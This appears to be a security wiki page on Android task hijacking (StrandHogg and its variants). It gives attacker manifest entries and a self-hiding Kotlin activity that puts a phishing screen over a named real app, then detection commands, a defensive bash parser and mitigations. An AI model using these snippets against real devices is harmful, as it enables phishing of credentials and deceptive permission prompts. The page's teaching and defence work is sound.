# Android Task Hijacking
{{#include ../../banners/hacktricks-training.md}}
## Task, Back Stack and Foreground Activities
In Android, a **task** is essentially the set of activities a user interacts with to accomplish a specific job, arranged in a **back stack**. The stack orders activities by when they were opened, with the most recently opened one on top as the **foreground activity**. At any moment only that activity is visible on screen, which makes it part of the **foreground task**.
Here is a summary of how activities move:
- **Activity 1** starts as the only activity in the foreground.
- Launching **Activity 2** pushes **Activity 1** onto the back stack and brings **Activity 2** to the foreground.
- Launching **Activity 3** moves **Activity 1** and **Activity 2** further down the stack, with **Activity 3** in front.
- Closing **Activity 3** returns **Activity 2** to the foreground, illustrating Android's task navigation model.
![https://developer.android.com/images/fundamentals/diagram_backstack.png](<../../images/image (698).png>)
---
## Task affinity attacks
`taskAffinity` tells Android which task an `Activity` prefers to belong to. When two activities share the same affinity, **Android is allowed to merge them into the same back stack even if they come from different APKs**.
If an attacker can place a malicious activity at the **root** of that stack, every time the victim opens the legitimate app the malicious UI is the first thing the user sees, which is ideal for phishing credentials or for abusive permission prompts.
The attack surface is wider than most developers assume because **every activity automatically receives an affinity equal to the app's package name** (unless the developer sets `android:taskAffinity=""`). So *doing nothing* already leaves an app exposed to task hijacking on Android versions before 11.
### Classic "singleTask / StrandHogg" scenario
1. The attacker declares an activity with:
```xml
<activity android:name=".EvilActivity"
    android:exported="true"
    android:taskAffinity="com.victim.package"
    android:launchMode="singleTask" >
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
    </intent-filter>
</activity>
```
2. The malicious app is launched once so that a task (with the spoofed affinity) exists in recents.
3. When the user later opens the real app, Android finds that a task whose **root affinity matches the package** already exists and brings that task to the foreground.
4. The attacker's UI is shown first.
### DefaultAffinity (no `singleTask`) variant: Caller ID case study
A vulnerability write-up for the **Caller ID (caller.id.phone.number.block)** app shows that the attack *also* works against the default `standard` launch mode:
1. The attacker app creates a fake root activity and immediately hides itself:
```kotlin
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity

class HackActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        moveTaskToBack(true) // keep the task in recents but out of sight
    }
}
```
2. The manifest only needs to copy the victim's package name into `taskAffinity`:
```xml
<activity android:name=".HackActivity"
    android:exported="true"
    android:taskAffinity="com.caller.id.phone.number.block" >
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
    </intent-filter>
</activity>
```
3. As soon as the user installs and opens the malicious app **once**, a task whose affinity matches the victim's package exists (but stays in the background).
4. When the real Caller ID app is launched, Android reuses that task and brings `HackActivity` to the foreground → phishing window / malicious prompt.
> NOTE: Starting with **Android 11 (API 30)** the system no longer places two packages that do not share a UID into the same task by default, which mitigates this particular variant. Older versions remain vulnerable.
---
### StrandHogg 2.0 (CVE-2020-0096): reflection-based task hijack
Google's May 2020 security bulletin fixed a more advanced variant dubbed **StrandHogg 2.0**. The exploit **does not rely on `taskAffinity` at all**; instead it uses *reflection* to inject the attacker's activity on top of *every* running task, completely bypassing the "shared-UID" restriction introduced by Android 11.
Key points:
* A malicious app with no permissions can, once opened, iterate over the running tasks and call hidden APIs to **promote** its own activity into any task.
* Because the activity is injected at run time, neither `launchMode` nor static manifest analysis can detect the attack beforehand.
* Fixed by restoring the checks on **Android 8.0/8.1/9** (May 2020 SPL). **Android 10 and later are not affected.**
On unpatched devices, detection can be done with `adb shell dumpsys activity activities`, looking for suspicious activities whose package name differs from the task's *affinity*.
Mitigation on older devices is the same as for classic task hijacking **plus** run-time verification (for example, calling [`ActivityManager#getRunningTasks`](https://developer.android.com/reference/android/app/ActivityManager#getRunningTasks(int)) and checking your own package name).
---
## Detection & Exploitation checklist
1. **Static review**: pull `AndroidManifest.xml` from the target APK and check that every `<activity>` (or the global `<application>` element) sets `android:taskAffinity=""` (empty) **or** a custom value. Tools such as:
```bash
# Using apkanalyzer (Android SDK)
apkanalyzer manifest print app.apk | grep -i taskaffinity
# Using AXMLPrinter2
java -jar AXMLPrinter2.jar AndroidManifest.xml | grep taskAffinity
```
2. **Dynamic review**: on the device, open the target app and list the tasks:
```bash
adb shell dumpsys activity activities | grep -A3 "TASK" | grep -E "Root|affinity"
```
A task whose root affinity matches the victim package but whose top activity belongs to a *different* package is a red flag.
3. Build a malicious app as described above, or use **[Drozer](https://github.com/WithSecureLabs/drozer)**:
```bash
drozer console connect
# drozer's --component takes the package and the component as two arguments
run app.activity.start --component com.victim com.victim.MainActivity --action android.intent.action.MAIN
run app.activity.info -a com.victim
```
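The two review steps above can be scripted so they run over tool output instead of being eyeballed. The following is an added example, not code from the original page or from HackTricks: `check_manifest_affinity` reads a decoded manifest and reports which activities override `taskAffinity`, and `find_hijacked_tasks` reads `dumpsys activity activities` output and flags tasks whose affinity equals the target package but which contain an activity from another package (the red flag described in step 2; it also catches an injected activity as in StrandHogg 2.0). The manifest and dumpsys samples are constructed to mimic real tool output, and the package names `com.victim.app` and `com.evil.app` are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original page). Both samples below are constructed
# to mimic tool output; com.victim.app and com.evil.app are placeholder names.
set -eu

# Step 1 helper. Reads a decoded AndroidManifest.xml on stdin and reports whether
# <application> sets android:taskAffinity="" and which <activity> elements
# override the affinity themselves (the rest inherit the package-name default).
check_manifest_affinity() {
  local flat app_elem elem name aff
  flat=$(tr '\n' ' ')   # one line, so each element is a single grep -o match
  app_elem=$(printf '%s' "$flat" | grep -o '<application[^>]*>' | head -n1 || true)
  if printf '%s' "$app_elem" | grep -q 'android:taskAffinity=""'; then
    echo 'application: taskAffinity="" (covers every activity)'
  else
    echo 'application: no empty taskAffinity (activities default to the package name)'
  fi
  printf '%s' "$flat" | grep -o '<activity [^>]*>' | while read -r elem; do
    name=$(printf '%s' "$elem" | sed -n 's/.*android:name="\([^"]*\)".*/\1/p')
    if printf '%s' "$elem" | grep -q 'android:taskAffinity='; then
      aff=$(printf '%s' "$elem" | sed -n 's/.*android:taskAffinity="\([^"]*\)".*/\1/p')
      echo "activity $name: taskAffinity=\"$aff\""
    else
      echo "activity $name: inherits application affinity"
    fi
  done
}

# Step 2 helper. Reads `adb shell dumpsys activity activities` output on stdin
# and prints every task whose affinity equals TARGET but which holds an activity
# from another package (an attacker root activity, or an injected activity).
find_hijacked_tasks() {
  local target="$1"
  awk -v target="$target" '
    function flush(   i, comp, pkg) {
      if (affinity != target) return
      for (i = 1; i <= n; i++) {
        comp = comps[i]; pkg = comp; sub(/\/.*/, "", pkg)   # package = text before "/"
        if (pkg == target || (task_id, comp) in seen) continue
        seen[task_id, comp] = 1
        printf "task=%s affinity=%s foreign=%s\n", task_id, affinity, comp
      }
    }
    # "* Task{...}" (Android 10+) or "* TaskRecord{...}" (older) opens a new task block
    /^[[:space:]]*\* Task(Record)?[{]/ {
      flush()
      task_id = ""; affinity = ""; n = 0
      if (match($0, /#[0-9]+/)) task_id = substr($0, RSTART + 1, RLENGTH - 1)
    }
    /^[[:space:]]*affinity=/ { sub(/^[[:space:]]*affinity=/, ""); affinity = $0 }
    # realActivity is the task root; each "* Hist #N:" line is one activity in the task
    /^[[:space:]]*(realActivity=|\* Hist #)/ {
      if (match($0, /[A-Za-z0-9_.]+\/[A-Za-z0-9_.$]+/)) comps[++n] = substr($0, RSTART, RLENGTH)
    }
    END { flush() }
  '
}

# Constructed manifest: MainActivity inherits the package-name affinity,
# LoginActivity opts out with an empty affinity.
MANIFEST_SAMPLE='<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.victim.app">
  <application android:label="Victim">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".LoginActivity" android:exported="false" android:taskAffinity=""/>
  </application>
</manifest>'

# Constructed dumpsys excerpt: task #42 carries the victim affinity but its root
# activity belongs to com.evil.app, the exact situation described in step 2.
DUMPSYS_SAMPLE='  * Task{a1b2c3 #41 type=standard A=com.victim.app U=0 sz=1}
    affinity=com.victim.app
    realActivity=com.victim.app/.MainActivity
    * Hist #0: ActivityRecord{11aa u0 com.victim.app/.MainActivity t41}
  * Task{d4e5f6 #42 type=standard A=com.victim.app U=0 sz=2}
    affinity=com.victim.app
    realActivity=com.evil.app/.HackActivity
    * Hist #1: ActivityRecord{22bb u0 com.victim.app/.MainActivity t42}
    * Hist #0: ActivityRecord{33cc u0 com.evil.app/.HackActivity t42}
  * Task{778899 #43 type=standard A=com.other.app U=0 sz=1}
    affinity=com.other.app
    realActivity=com.other.app/.Main
    * Hist #0: ActivityRecord{44dd u0 com.other.app/.Main t43}'

printf '%s\n' "$MANIFEST_SAMPLE" | check_manifest_affinity
printf '%s\n' "$DUMPSYS_SAMPLE" | find_hijacked_tasks com.victim.app
# On a real device: adb shell dumpsys activity activities | find_hijacked_tasks com.victim.app
```

Against the constructed samples the manifest helper reports that `.MainActivity` inherits the application affinity, and the task helper prints a single line for task `#42` naming `com.evil.app/.HackActivity` as the foreign activity. The awk parser keys on `affinity=`, `realActivity=` and `* Hist #` lines, which are present in `dumpsys activity activities` output across the Android versions discussed on this page; if a vendor build formats them differently, adjust those three patterns.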
---
## Mitigation
Developers should:
* Explicitly set `android:taskAffinity=""` at the `<application>` level (recommended) **or** give every activity a unique, private affinity.
* For highly sensitive screens, combine the above with `android:launchMode="singleInstance"` or the modern [`setLaunchMode`](https://developer.android.com/reference/android/content/pm/ActivityInfo#launchMode) protections.
* Raise the app's `targetSdkVersion` and adopt the **Android 11** behaviour change under which tasks are no longer shared between packages by default.
* Target **Android 12 (API 31) or higher** so that the mandatory `android:exported` attribute forces developers to review every component reachable from outside.
* Consider run-time self-defence: periodically query `ActivityTaskManager` to verify that the package of your top activity matches your own.
---
## Related UI-Hijacking techniques
Task hijacking is often combined with, or replaced by, **tapjacking** (overlay-based UI deception). The 2025 **TapTrap** research showed that *animation-driven* transparent activities can bypass the overlay-touch restrictions introduced in Android 12 to 14 and still trick users into granting dangerous permissions. Although TapTrap is not strictly *task* hijacking, the end goal (luring a tap) is the same, so modern assessments should cover the whole attack surface.
---
## References
- [https://blog.dixitaditya.com/android-task-hijacking/](https://blog.dixitaditya.com/android-task-hijacking/)
- [https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html)
- [Android Manifest Misconfiguration Leading to Task Hijacking in Caller ID app](https://github.com/KMov-g/androidapps/blob/main/caller.id.phone.number.block.md)
- [https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06](https://medium.com/mobile-app-development-publication/the-risk-of-android-strandhogg-security-issue-and-how-it-can-be-mitigated-80d2ddb4af06)
- [Promon StrandHogg 2.0 (CVE-2020-0096) technical write-up](https://promon.io/resources/downloads/strandhogg-2-0-new-serious-android-vulnerability)
- [USENIX 2025 TapTrap: Animation-Driven Tapjacking on Android](https://www.usenix.org/conference/usenixsecurity25/presentation/beer)
{{#include ../../banners/hacktricks-training.md}}